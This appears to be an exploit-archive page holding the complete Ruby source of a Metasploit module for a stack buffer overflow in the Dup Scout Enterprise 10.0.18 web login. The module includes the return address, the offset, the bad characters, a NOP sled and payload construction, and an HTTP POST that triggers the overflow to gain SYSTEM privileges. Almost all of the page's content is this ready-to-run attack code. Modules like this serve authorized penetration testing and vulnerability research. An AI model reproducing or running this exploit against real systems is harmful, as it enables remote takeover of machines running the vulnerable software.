Dup Scout Enterprise 10.0.18 Buffer Overflow

Dup Scout Enterprise 10.0.18 Buffer Overflow: Posted Dec 13, 2017; Authored by sickness, Chris Higgins | Site metasploit.com; This Metasploit module exploits a stack buffer overflow in Dup Scout Enterprise version 10.0.18. The buffer overflow exists via the web interface during login. This gives NT AUTHORITY\SYSTEM access.; tags | exploit, web, overflow; SHA-256 | 67efc4aaa88613a74e677907f3bedd53194705d0e358c6a390abcbecf955e8fd; Download | Favorite | View

Dup Scout Enterprise 10.0.18 Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dup Scout Enterprise Login Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Dup Scout Enterprise
        10.0.18. The buffer overflow exists via the web interface during
        login. This gives NT AUTHORITY\SYSTEM access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Higgins', # msf Module -- @ch1gg1ns
          'sickness' # Original discovery
        ],
      'References'     =>
        [
          [ 'EDB', '43145' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
        },
      'Targets'        =>
        [
          [ 'Dup Scout Enterprise 10.0.18',
            {
              'Ret' => 0x10090c83, # jmp esp - libspp.dll
              'Offset' => 780
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Nov 14 2017',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(80)])

  end

  def check
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    print_status("Generating exploit...")

    evil =  rand_text(target['Offset'])
    evil << [target.ret].pack('V')
    evil << make_nops(12)
    evil << payload.encoded
    evil << make_nops(10000 - evil.length)

    vprint_status("Evil length: " + evil.length.to_s)

    sploit =  "username="
    sploit << evil
    sploit << "&password="
    sploit << rand_text(evil.length)
    sploit << "\r\n"

    print_status("Triggering the exploit now...")

    res = send_request_cgi({
      'uri' => '/login',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'content-length' => '17000',
      'data' => sploit
    })

    handler
    disconnect

  end
end

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 91 files
Gentoo 31 files
Debian 17 files
indoushka 12 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,465)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,354)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,678)
UNIX (9,430)
UnixWare (187)
Windows (6,667)
Other

Dup Scout Enterprise 10.0.18 Buffer Overflow

Dup Scout Enterprise 10.0.18 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dup Scout Enterprise 10.0.18 Buffer Overflow

Share This

Dup Scout Enterprise 10.0.18 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems